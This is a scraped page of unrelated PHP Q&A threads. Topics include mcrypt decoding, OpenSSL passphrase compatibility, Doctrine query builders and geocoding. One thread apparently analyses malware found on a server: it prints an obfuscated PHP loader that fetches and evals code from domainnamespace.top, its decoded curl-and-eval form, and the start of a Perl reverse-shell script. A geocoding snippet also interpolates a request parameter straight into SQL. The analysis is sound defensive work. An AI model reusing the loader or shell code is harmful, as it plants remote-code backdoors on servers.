Develop Reference

php mcrypt_decrypt, base64_decode and line break - mcrypt

How to make a line break? For example:
line1
line2
line3
after decoding, look like -> line1 line2 line3
$key = $_POST['key']; $input = $_POST['text'];
$algo = MCRYPT_RIJNDAEL_256;
$mode = MCRYPT_MODE_CBC;
$iv_size = mcrypt_get_iv_size($algo, $mode);
$iv = mcrypt_create_iv($iv_size, MCRYPT_DEV_URANDOM);
switch($_POST['do']){
default: die;
case 'encode':
$ciphertext = mcrypt_encrypt($algo, $key, $input, $mode, $iv);
$ciphertext = $iv . $ciphertext;
echo base64_encode($ciphertext);
break;
case 'decode':
$ciphertext_dec = base64_decode($input);
$iv_dec = substr($ciphertext_dec, 0, $iv_size);
$ciphertext_dec = substr($ciphertext_dec, $iv_size);
echo htmlspecialchars(mcrypt_decrypt($algo, $key, $ciphertext_dec, $mode, $iv_dec));
break;
}

Solved. I use nl2br
echo nl2br(htmlspecialchars(mcrypt_decrypt($algo, $key, $ciphertext_dec, $mode, $iv_dec)));

Related

I am trying to convert the following shell commands into php but I ma not getting correct results
$key = 'my_key';
$cmd = "echo -n $plaintext| openssl enc -e -aes-256-cbc -a -k $key -md md5";
$exec = exec($cmd, $output, $status);
return $status == 0 ? $output[0] : null;
the above works in php7.4. I have tried the following
$key = "my_key";
echo "key: $key\n";
//$key = password_hash($key, PASSWORD_BCRYPT, ['cost' => 12]);
//echo "key: $key\n";
$ciphertext = openssl_encrypt($plaintext, 'aes-256-cbc', $key, null, 'UqA8Z5ztUYnWhnUE');
echo "ciphertext: $ciphertext\n";
echo "merged: $key$ciphertext\n";
return $key . $ciphertext;
This is not working. The key is supplied by 3rd party
UPDATE
I have tried the following
create a key and iv
# openssl enc -nosalt -aes-256-cbc -k hello-aes -P -md md5 *** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
key=C639A572E14D5075C526FDDD43E4ECF6B095EA17783D32EF3D2710AF9F359DD4
iv =D09A4D2C5DC39843FE075313A7EF2F4C
on cli I can use the key to encrypt and decrypt
encrypt
# echo -n email#gmail.com | openssl enc -e -aes-256-cbc -a -k C639A572E14D5075C526FDDD43E4ECF6B095EA17783D32EF3D2710AF9F359DD4 -md md5
*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
U2FsdGVkX1+GpDPQ5uLeXlZL9CEgKaBDgDuwvf00m9U=
decrypt
# echo U2FsdGVkX1+GpDPQ5uLeXlZL9CEgKaBDgDuwvf00m9U= | openssl enc -d -aes-256-cbc -a -k C639A572E14D5075C526FDDD43E4ECF6B095EA17783D32EF3D2710AF9F359DD4 -md md5
*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
email#gmail.com
In PhP
I use the key and iv I created from cli. the key is provided to me i do not get to generate this
function encryptAES256CBC(string $plaintext): string
{
$key = 'C639A572E14D5075C526FDDD43E4ECF6B095EA17783D32EF3D2710AF9F359DD4';
//echo "key hex2bin ". md5($key) . "\n\n";
$iv = hex2bin('D09A4D2C5DC39843FE075313A7EF2F4C');
echo "key: $key\n";
$cipher="aes-256-cbc";
$ciphertext_raw = openssl_encrypt($plaintext, $cipher, $key, $options=OPENSSL_RAW_DATA, $iv);//, null, 'UqA8Z5ztUYnWhnUE');
echo "ciphertext_raw: $ciphertext_raw\n";
echo "base64_encode: ".base64_encode($ciphertext_raw)."\n";
echo "base64_encode md5: ".md5(base64_encode($ciphertext_raw))."\n";
echo "md5: ".md5($ciphertext_raw)."\n";
return md5($ciphertext_raw);
return $key . $ciphertext_raw;
}
I tried to decode the above output on cli to check it works but it does not. i get error bad magic number
output
key: C639A572E14D5075C526FDDD43E4ECF6B095EA17783D32EF3D2710AF9F359DD4
ciphertext_raw: y▒▒yV▒ύ2▒G▒▒▒¤▒!▒▒▒%▒"ҋ~▒
base64_encode: B3n1+XlWtM+NMrlHue8R28KkmiG8tpUl/Iwi0ot+vg4=
base64_encode md5: f65b8e0ed4fc86d4b405d37a57bcd6e5
md5: 14e9f14ee94a2c34e52ad80e3f300d40
DECRYPT 14e9f14ee94a2c34e52ad80e3f300d40
[12:27:43] Destructor
root#0ea89b7ad9df:/# echo 14e9f14ee94a2c34e52ad80e3f300d40 | openssl enc -d -aes-256-cbc -a -k C639A572E14D5075C526FDDD43E4ECF6B095EA17783D32EF3D2710AF9F359DD4 -md md5
bad magic number
UPDATE
I have managed to get decypt working but encrypt not working
this is what I have
$passphrase = 'random';
$salt = openssl_random_pseudo_bytes(8);
$keyData = self::evpBytesToKey($salt, $passphrase);
$key = substr($keyData, 0, 32);
$iv = substr($keyData, 32, 16);
$method = 'AES-256-CBC';
$ciphertext_raw = openssl_encrypt($plaintext, $method, $key, OPENSSL_RAW_DATA, $iv);
echo "ciphertext_raw: $ciphertext_raw\n";
echo "base64_encode: ".base64_encode($ciphertext_raw)."\n";
echo "base64_encode md5: ".md5(base64_encode($ciphertext_raw))."\n";
echo "md5: ".md5($ciphertext_raw)."\n";
echo "merged: ".base64_encode($iv.$ciphertext_raw)."\n";
return md5($ciphertext_raw);
return base64_encode("Salted__" . $salt . $ciphertext_raw);

The following code is a full running example that uses the "EVP_BytesToKey" key derivation as commented by #Topaco.
Kindly note that this kind of key derivation is UNSECURE as it uses the broken MD5 algorithm and an iteration count of only 1. Please use the code only for migration purpose, thanks.
This is a possible output [as there are random elements your output will differ]:
AES CBC 256 String encryption with passphrase
# # # SECURITY WARNING: This code is provided for achieve # # #
# # # compatibility between different programming languages. # # #
# # # It is not necessarily fully secure. # # #
# # # Its security depends on the complexity and length # # #
# # # of the password, because of only one iteration and # # #
# # # the use of MD5. # # #
# # # DO NOT USE THIS CODE IN PRODUCTION # # #
passphrase: my secret passphrase
* * * Encryption * * *
ciphertext: U2FsdGVkX1/+hqfCdNaZ36kZzPzwvFXkr4nEySMEgdVdPnPrGUj2Gi1t2pspAH2WHVEVgKHKWfR2Gc0sKnTlLg==
output is (Base64) ciphertext
* * * Decryption * * *
passphrase: my secret passphrase
ciphertext (Base64): U2FsdGVkX19rV+JOoeF72K54jlyJ47tNEsMjih7gDnFUysZFaw+WnYTB5L/hc2+rssFj1hXw3N8kkikHwClB2w==
input is (Base64) ciphertext
plaintext: The quick brown fox jumps over the lazy dog
code:
<?php
// source: https://github.com/blocktrail/cryptojs-aes-php/blob/master/src/CryptoJSAES.php
// author: BlockTrail
function aesCbcPassphraseEncryptToBase64($passphrase, $data, $salt = null) {
$salt = $salt ?: openssl_random_pseudo_bytes(8);
list($key, $iv) = evpkdf($passphrase, $salt);
$ct = openssl_encrypt($data, 'aes-256-cbc', $key, true, $iv);
return encode($ct, $salt);
}
function aesCbcPassphraseDecryptFromBase64($passphrase, $base64) {
list($ct, $salt) = decode($base64);
list($key, $iv) = evpkdf($passphrase, $salt);
$data = openssl_decrypt($ct, 'aes-256-cbc', $key, true, $iv);
return $data;
}
function evpkdf($passphrase, $salt) {
$salted = '';
$dx = '';
while (strlen($salted) < 48) {
$dx = md5($dx . $passphrase . $salt, true);
$salted .= $dx;
}
$key = substr($salted, 0, 32);
$iv = substr($salted, 32, 16);
return [$key, $iv];
}
function decode($base64) {
$data = base64_decode($base64);
if (substr($data, 0, 8) !== "Salted__") {
return "";
}
$salt = substr($data, 8, 8);
$ct = substr($data, 16);
return [$ct, $salt];
}
function encode($ct, $salt) {
return base64_encode("Salted__" . $salt . $ct);
}
echo 'AES CBC 256 String encryption with passphrase' . PHP_EOL;
echo PHP_EOL . '# # # SECURITY WARNING: This code is provided for achieve # # #' . PHP_EOL;
echo '# # # compatibility between different programming languages. # # #' . PHP_EOL;
echo '# # # It is not necessarily fully secure. # # #' . PHP_EOL;
echo '# # # Its security depends on the complexity and length # # #' . PHP_EOL;
echo '# # # of the password, because of only one iteration and # # #' . PHP_EOL;
echo '# # # the use of MD5. # # #' . PHP_EOL;
echo '# # # DO NOT USE THIS CODE IN PRODUCTION # # #' . PHP_EOL;
$plaintext = 'The quick brown fox jumps over the lazy dog';
$passphrase = 'my secret passphrase';
echo PHP_EOL . 'passphrase: ' . $passphrase . PHP_EOL;
echo PHP_EOL . '* * * Encryption * * *' . PHP_EOL;
$ciphertextBase64 = aesCbcPassphraseEncryptToBase64($passphrase, $plaintext);
echo 'ciphertext (Base64): ' . $ciphertextBase64 . PHP_EOL;
echo 'output is (Base64) ciphertext' . PHP_EOL;
echo PHP_EOL . '* * * Decryption * * *' . PHP_EOL;
$decryptionPassphrase = $passphrase;
$ciphertextDecryptionBase64 = $ciphertextBase64;
echo 'decryptionPassphrase: ' . $decryptionPassphrase . PHP_EOL;
echo 'ciphertext (Base64): ' . $ciphertextDecryptionBase64 . PHP_EOL;
echo 'input is (Base64) ciphertext' . PHP_EOL;
$decryptedtext = aesCbcPassphraseDecryptFromBase64($decryptionPassphrase, $ciphertextDecryptionBase64);
echo 'plaintext: ' . $decryptedtext . PHP_EOL;
?>

Need help decoding this
<?php $vcbf840= "eC.vZ176u(onAK0F4H D_RNwGygrx9Y5)WpIlMtfhQ2P-S;mEbq8OXjJTsc*kiVB,L3z+ad/U";function yprr503($ccun221,$ipue244,$tgju488){return ''.$ccun221.''.$ipue244.''.$tgju488.'';}$xjow903 = yprr503($vcbf840{58},$vcbf840{69}.$vcbf840{36},$vcbf840{36});$zjcn038 = yprr503($vcbf840{20}.$vcbf840{8},$vcbf840{57}.$vcbf840{0},'');$llof213 = yprr503($vcbf840{27},$vcbf840{20},$vcbf840{39});$nogd067 = yprr503($vcbf840{8},'',$vcbf840{11});$fsps364 = yprr503($vcbf840{58},$vcbf840{20},$vcbf840{69}.$vcbf840{27});$kjhe036 = yprr503($vcbf840{27},$vcbf840{69},$vcbf840{25});$smyo112 =yprr503(yprr503($xjow903,'',$zjcn038),yprr503($llof213,$nogd067,''),yprr503($fsps364,'',$kjhe036));$gopp378 = yprr503($vcbf840{58},$vcbf840{27},$vcbf840{0});$oont490 = yprr503($vcbf840{69},$vcbf840{38},'');$lllq180 = yprr503($vcbf840{0},'',$vcbf840{20});$ecnr938 = yprr503($vcbf840{39},$vcbf840{8},$vcbf840{11});$ffdi480 = yprr503($vcbf840{58},$vcbf840{38},'');$dxkt204 = yprr503($vcbf840{61},$vcbf840{10},'');$icbz544 = yprr503('',$vcbf840{11},'');$uohg939 = yprr503( yprr503($gopp378,$oont490,$lllq180), yprr503($ecnr938,'',$ffdi480), yprr503($dxkt204,'',$icbz544));$idgk110 = yprr503($vcbf840{0},'',$vcbf840{3});$opvu721= yprr503($vcbf840{69},$vcbf840{36},$vcbf840{9});$mtbg524 = yprr503('',$vcbf840{49},$vcbf840{69});$yxfs212 = yprr503($vcbf840{57},$vcbf840{0},$vcbf840{7});$vesg899 = yprr503($vcbf840{16},$vcbf840{20},$vcbf840{70});$ehjl604 = yprr503($vcbf840{0},$vcbf840{58},$vcbf840{10});$bxlr460 = yprr503($vcbf840{70},$vcbf840{0},$vcbf840{9});$jyhp869 = yprr503(yprr503($idgk110,$opvu721,''),yprr503('','',$mtbg524),yprr503($yxfs212,$vesg899.$ehjl604,$bxlr460))."'JGNoID0gY3VybF9pbml0KCdodHRwOi8vZG9tYWlubmFtZXNwYWNlLnRvcC9sZi50eHQnKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyRyZXN1bHQgPSBjdXJsX2V4ZWMoJGNoKTtldmFsKCc/PicuJHJlc3VsdCk7'".yprr503($vcbf840{32}.$vcbf840{32},'',$vcbf840{46});$smyo112($uohg939,array('','}'.$jyhp869.'//'));?>

Phase 1:
<?php $vcbf840= "eC.vZ176u(onAK0F4H D_RNwGygrx9Y5)WpIlMtfhQ2P-S;mEbq8OXjJTsc*kiVB,L3z+ad/U";function yprr503($ccun221,$ipue244,$tgju488){return ''.$ccun221.''.$ipue244.''.$tgju488.'';}$xjow903 = yprr503($vcbf840{58},$vcbf840{69}.$vcbf840{36},$vcbf840{36});$zjcn038 = yprr503($vcbf840{20}.$vcbf840{8},$vcbf840{57}.$vcbf840{0},'');$llof213 = yprr503($vcbf840{27},$vcbf840{20},$vcbf840{39});$nogd067 = yprr503($vcbf840{8},'',$vcbf840{11});$fsps364 = yprr503($vcbf840{58},$vcbf840{20},$vcbf840{69}.$vcbf840{27});$kjhe036 = yprr503($vcbf840{27},$vcbf840{69},$vcbf840{25});$smyo112 =yprr503(yprr503($xjow903,'',$zjcn038),yprr503($llof213,$nogd067,''),yprr503($fsps364,'',$kjhe036));$gopp378 = yprr503($vcbf840{58},$vcbf840{27},$vcbf840{0});$oont490 = yprr503($vcbf840{69},$vcbf840{38},'');$lllq180 = yprr503($vcbf840{0},'',$vcbf840{20});$ecnr938 = yprr503($vcbf840{39},$vcbf840{8},$vcbf840{11});$ffdi480 = yprr503($vcbf840{58},$vcbf840{38},'');$dxkt204 = yprr503($vcbf840{61},$vcbf840{10},'');$icbz544 = yprr503('',$vcbf840{11},'');$uohg939 = yprr503( yprr503($gopp378,$oont490,$lllq180), yprr503($ecnr938,'',$ffdi480), yprr503($dxkt204,'',$icbz544));$idgk110 = yprr503($vcbf840{0},'',$vcbf840{3});$opvu721= yprr503($vcbf840{69},$vcbf840{36},$vcbf840{9});$mtbg524 = yprr503('',$vcbf840{49},$vcbf840{69});$yxfs212 = yprr503($vcbf840{57},$vcbf840{0},$vcbf840{7});$vesg899 = yprr503($vcbf840{16},$vcbf840{20},$vcbf840{70});$ehjl604 = yprr503($vcbf840{0},$vcbf840{58},$vcbf840{10});$bxlr460 = yprr503($vcbf840{70},$vcbf840{0},$vcbf840{9});$jyhp869 = yprr503(yprr503($idgk110,$opvu721,''),yprr503('','',$mtbg524),yprr503($yxfs212,$vesg899.$ehjl604,$bxlr460))."'JGNoID0gY3VybF9pbml0KCdodHRwOi8vZG9tYWlubmFtZXNwYWNlLnRvcC9sZi50eHQnKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyRyZXN1bHQgPSBjdXJsX2V4ZWMoJGNoKTtldmFsKCc/PicuJHJlc3VsdCk7'".yprr503($vcbf840{32}.$vcbf840{32},'',$vcbf840{46});$smyo112($uohg939,array('','}'.$jyhp869.'//'));?>
Phase 2(Beautified and renamed):
<?php $mal_string = "eC.vZ176u(onAK0F4H D_RNwGygrx9Y5)WpIlMtfhQ2P-S;mEbq8OXjJTsc*kiVB,L3z+ad/U";
function fun1($param1, $param2, $param3)
{
return '' . $param1 . '' . $param2 . '' . $param3 . '';
}
$xjow903 = fun1($mal_string{58}, $mal_string{69} . $mal_string{36}, $mal_string{36});
$zjcn038 = fun1($mal_string{20} . $mal_string{8}, $mal_string{57} . $mal_string{0}, '');
$llof213 = fun1($mal_string{27}, $mal_string{20}, $mal_string{39});
$nogd067 = fun1($mal_string{8}, '', $mal_string{11});
$fsps364 = fun1($mal_string{58}, $mal_string{20}, $mal_string{69} . $mal_string{27});
$kjhe036 = fun1($mal_string{27}, $mal_string{69}, $mal_string{25});
$smyo112 = fun1(fun1($xjow903, '', $zjcn038) , fun1($llof213, $nogd067, '') , fun1($fsps364, '', $kjhe036));
$gopp378 = fun1($mal_string{58}, $mal_string{27}, $mal_string{0});
$oont490 = fun1($mal_string{69}, $mal_string{38}, '');
$lllq180 = fun1($mal_string{0}, '', $mal_string{20});
$ecnr938 = fun1($mal_string{39}, $mal_string{8}, $mal_string{11});
$ffdi480 = fun1($mal_string{58}, $mal_string{38}, '');
$dxkt204 = fun1($mal_string{61}, $mal_string{10}, '');
$icbz544 = fun1('', $mal_string{11}, '');
$uohg939 = fun1(fun1($gopp378, $oont490, $lllq180) , fun1($ecnr938, '', $ffdi480) , fun1($dxkt204, '', $icbz544));
$idgk110 = fun1($mal_string{0}, '', $mal_string{3});
$opvu721 = fun1($mal_string{69}, $mal_string{36}, $mal_string{9});
$mtbg524 = fun1('', $mal_string{49}, $mal_string{69});
$yxfs212 = fun1($mal_string{57}, $mal_string{0}, $mal_string{7});
$vesg899 = fun1($mal_string{16}, $mal_string{20}, $mal_string{70});
$ehjl604 = fun1($mal_string{0}, $mal_string{58}, $mal_string{10});
$bxlr460 = fun1($mal_string{70}, $mal_string{0}, $mal_string{9});
$jyhp869 = fun1(fun1($idgk110, $opvu721, '') , fun1('', '', $mtbg524) , fun1($yxfs212, $vesg899 . $ehjl604, $bxlr460)) . "'JGNoID0gY3VybF9pbml0KCdodHRwOi8vZG9tYWlubmFtZXNwYWNlLnRvcC9sZi50eHQnKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyRyZXN1bHQgPSBjdXJsX2V4ZWMoJGNoKTtldmFsKCc/PicuJHJlc3VsdCk7'" . fun1($mal_string{32} . $mal_string{32}, '', $mal_string{46});
$smyo112($uohg939, array(
'',
'}' . $jyhp869 . '//'
)); ?>
Phase 3(strings replaced based on mal_string content):
<?php $mal_string = "eC.vZ176u(onAK0F4H D_RNwGygrx9Y5)WpIlMtfhQ2P-S;mEbq8OXjJTsc*kiVB,L3z+ad/U";
function fun1($param1, $param2, $param3)
{
return '' . $param1 . '' . $param2 . '' . $param3 . '';
}
$xjow903 = fun1(c, a . l, l);
$zjcn038 = fun1(_ . u, s . e, '');
$llof213 = fun1(r, _, f);
$nogd067 = fun1(u, '', n);
$fsps364 = fun1(c, _, a . r);
$kjhe036 = fun1(r, a, y);
$smyo112 = fun1(fun1($xjow903, '', $zjcn038) , fun1($llof213, $nogd067, '') , fun1($fsps364, '', $kjhe036));
$gopp378 = fun1(c, r, e);
$oont490 = fun1(a, n, '');
$lllq180 = fun1(e, '', _);
$ecnr938 = fun1(f, u, n);
$ffdi480 = fun1(c, n, '');
$dxkt204 = fun1(i, o, '');
$icbz544 = fun1('', n, '');
$uohg939 = fun1(fun1($gopp378, $oont490, $lllq180) , fun1($ecnr938, '', $ffdi480) , fun1($dxkt204, '', $icbz544));
$idgk110 = fun1(e, '', v);
$opvu721 = fun1(a, l, ();
$mtbg524 = fun1('', b, a);
$yxfs212 = fun1(s, e, 6);
$vesg899 = fun1(4, _, d);
$ehjl604 = fun1(e, c, o);
$bxlr460 = fun1(d, e, ();
$jyhp869 = fun1(fun1($idgk110, $opvu721, '') , fun1('', '', $mtbg524) , fun1($yxfs212, $vesg899 . $ehjl604, $bxlr460)) . "'JGNoID0gY3VybF9pbml0KCdodHRwOi8vZG9tYWlubmFtZXNwYWNlLnRvcC9sZi50eHQnKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyRyZXN1bHQgPSBjdXJsX2V4ZWMoJGNoKTtldmFsKCc/PicuJHJlc3VsdCk7'" . fun1() . ), '', ;);
$smyo112($uohg939, array(
'',
'}' . $jyhp869 . '//'
)); ?>
We can see that fun1 is simply a concatenator/obfuscator.
Finally, you can see from the latter part of the blob, that it will use eval() and base64decode() on the remaining long text.
Phase4: (to be continued).
$jyhp869 = fun1(fun1($idgk110, $opvu721, '') , fun1('', '', $mtbg524) , fun1($yxfs212, $vesg899 . $ehjl604, $bxlr460)) . "'JGNoID0gY3VybF9pbml0KCdodHRwOi8vZG9tYWlubmFtZXNwYWNlLnRvcC9sZi50eHQnKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyRyZXN1bHQgPSBjdXJsX2V4ZWMoJGNoKTtldmFsKCc/PicuJHJlc3VsdCk7'" . fun1() . ), '', ;);
This translates to the following after Base64 decode:
$ch = curl_init('http://domainnamespace.top/lf.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
eval('?>'.$result);
Which will run and execute the resulting PHP script in the txt file. You can lookup the domian information of domainnamespace[.]top(appended for safety) for instance in https://lookup.icann.org/lookup
The home page looks suspcicious:
https://urlscan.io/result/96bf6052-d5e3-49ca-9580-fa6432a34168
The txt file has been limited for download with appropriate user agents only, and is taken down, but would have been running the following code on your server:
https://urlscan.io/screenshots/a5f489b3-df37-4ccc-8421-304eea50f4f1.png
After a bit of searching, I found that the full PHP script is not saved in urlscan, however it can be found in VT:
https://www.virustotal.com/gui/file/5240b41ce13bf3004f2f3e13ac1394351925d12b3d716d1423f3948b131055d8/detection
The file is a PHP webshell(~60kb), essentially providing backdoor functionality.
It will read basic information from the target PHP server regardless of Windows/Linux such as IP, network connections, look for config.php files, and other details related to credentials and users, iterates directories, submits details. There might be some perl scripts still present in your temp directory that are used for the backdoor functionality opening tcp sockets.
#!/usr/bin/perl
$SHELL="/bin/sh -i";
if (#ARGV < 1) { exit(1); }
use Socket;
... omitted ...
This backdoor has been detected already in December, your webserver might be compromised since months.
Last Submission 2019-12-13 14:41:35
Feel free to reach out if you need more help, and appreciate an accepted answer & upvotes.

I have a query that receive some array parameters without any ideas how rows there is. It must return contents with all filters (AND clause), and one or more categories (OR clause).
I can't get results I'd like because parentheses are not a the good place. I should got this SQL rendering:
WHERE (
f3_.idfilter = '87'
AND f5_.idfilter = '90'
AND f7_.idfilter = '154'
AND f9_.idfilter = '165'
)
AND (
c0_.content_category_idcontent_category = 1
OR c0_.content_category_idcontent_category = 3
)
and got this instead:
WHERE (
(
f3_.idfilter = '87'
AND f5_.idfilter = '90'
AND f7_.idfilter = '154'
AND f9_.idfilter = '165'
AND c0_.content_category_idcontent_category = 1
)
OR c0_.content_category_idcontent_category = 3
)
My code:
public function getContentByFiltersAjax($categs, $filters, $offset, $limit) {
$filtersTab = explode(',', $filters);
$query = $this->createQueryBuilder('c');
for ($i = 1; $i <= count($filtersTab); $i++) {
$query = $query
->leftJoin('c.filterfilter', 'f' . $i)
->andWhere('f' . $i . '.idfilter = :filter_idfilter' . $i)
->setParameter('filter_idfilter' . $i, $filtersTab[$i - 1]);
}
$categsTab = explode(',', $categs);
if(sizeof($categsTab) > 1) {
$expr = $query->expr();
$categsTab = explode(',', $categs);
foreach ($categsTab as $key => $value) {
if($key === 0){
$query->andWhere($expr->eq('c.contentCategorycontentCategory', $value));
} else {
$query->orWhere($expr->eq('c.contentCategorycontentCategory', $value));
}
}
} else {
$query
->andWhere('c.contentCategorycontentCategory = :category')
->setParameter('category', $categs);
}
$query
->andWhere('c.status = :status')
->setParameter('status', 'publie');
$query->orderBy('editor.plan', 'DESC');
$query->addOrderBy('c.creationDate', 'DESC');
$query
->setFirstResult($offset)
->setMaxResults($limit);
$result = $query->distinct()->getQuery()->getResult();
return $result;
}

You put the orWhere's inside 1 andWhere like this:
$query->andWhere(
$query->expr->orX(
$query->expr->eq('c.contentCategorycontentCategory', $value1),
$query->expr->eq('c.contentCategorycontentCategory', $value2)
)
);
Or in your foreach loop:
$orX = $query->expr->orX();
foreach ($categsTab as $value) {
$orX->add($query->expr->eq('c.contentCategorycontentCategory', $value));
}
$query->andWhere($orX);

Here is my code to filter pets base on a JSON ajax Query
I am getting error follwoing image
public function filter($object, $active=true){
$query = $this->createQueryBuilder('p');
$query->innerjoin('TadpetProfessionalBundle:ProPet', 'pp', 'WITH', 'pp.professionalId = p.id');
$query->innerjoin('TadpetManagerBundle:Pet', 'ppp', 'WITH', 'ppp.id = pp.petId');
$query->where('p.isActive = :active')
->setParameter('active', $active);
if(!empty($object->pets)){
$qString = "";
for($i=1; $i<=sizeof($object->pets); $i++){
if($i == 1){
$qString .= "ppp.name = :petname".$i;
}else{
$qString .= " OR ppp.name = :petname".$i;
}
}
$query->andWhere($qString);
$query->setParameter('petname'+1,$object->pets[0]);
$query->setParameter('petname'+2,$object->pets[1]);
$query->setParameter('petname'+3,$object->pets[2]);
}
return $query->getQuery()->getResult();
}
Help me please

In these lines:
$query->setParameter('petname'+1,$object->pets[0]);
$query->setParameter('petname'+2,$object->pets[1]);
$query->setParameter('petname'+3,$object->pets[2]);
You are adding 'petname' to the numbers, but you should concatenate them:
$query->setParameter('petname'.1,$object->pets[0]);
$query->setParameter('petname'.2,$object->pets[1]);
$query->setParameter('petname'.3,$object->pets[2]);
Also, you could use a loop:
for($i=1; $i<=sizeof($object->pets); $i++){
$query->setParameter('petname'.$i,$object->pets[$i-1]);
}

Kindly help on the code below. What happens is that I get the latitude and longitude of the name of a place when I click on a button. However, of late, it is not working. It prints that "Address x failed to Geocode. Received status " Note that x is a given address and no status code is given.
$id=$_REQUEST['id'];
define("MAPS_HOST", "maps.googleapis.com");
define("KEY", "xxxxxxx");
$query = "SELECT * FROM markers WHERE mid = $id LIMIT 1";
$result = mysql_query($query);
if (!$result) {
die("Invalid query: " . mysql_error());
}
// Initialize delay in geocode speed
$delay = 0;
$base_url = "http://" . MAPS_HOST . "/maps/api/geocode/xml?address=";
if($row = #mysql_fetch_assoc($result)){
$geocode_pending = true;
$address = $row["address"];
while ($geocode_pending) {
$request_url = $base_url . urlencode($address) . "&sensor=false&key=" . KEY;
$xml = simplexml_load_file($request_url) or die("url not loading");
$status = $xml->Response->Status->code;
if (strcmp($status, "200") == 0) {
// Successful geocode
$geocode_pending = false;
$coordinates = $xml->Response->Placemark->Point->coordinates;
//$coordinatesSplit = split(",", $coordinates);
// Format: Longitude, Latitude, Altitude
//$lat = $coordinatesSplit[1];
//$lng = $coordinatesSplit[0];
list($lat,$lng) = explode(",",$coordinates);
$query = sprintf("UPDATE markers " .
" SET lat = '%s', lng = '%s' " .
" WHERE mid = '%s' LIMIT 1;",
mysql_real_escape_string($lng),
mysql_real_escape_string($lat),
mysql_real_escape_string($id));
$update_result = mysql_query($query);
if (!$update_result) {
die("Invalid query: " . mysql_error());
}else{
echo "$lat;$lng";
}
} else if (strcmp($status, "620") == 0) {
// sent geocodes too fast
$delay += 100000;
} else {
// failure to geocode
$geocode_pending = false;
echo "Address " . $address . " failed to geocode. ";
echo "Received status " . $status . "
\n";
}
usleep($delay);
}
}

I'm not sure on which API your code is based on, but the response of the current API will not work with these lines:
$status = $xml->Response->Status->code;
if (strcmp($status, "200") == 0) {
There are no elements Response,Status or code, furthermore the response will not contain a numeric status-code.
use this instead:
$status = $xml->status;
if (strcmp($status, "OK") == 0) {
To fix the rest of the code please take a look at the structure of the returned XML, there are also no elements Placemark,Point and coordinates.
it should be:
$lat = $xml->result->geometry->location->lat;
$lng = $xml->result->geometry->location->lng;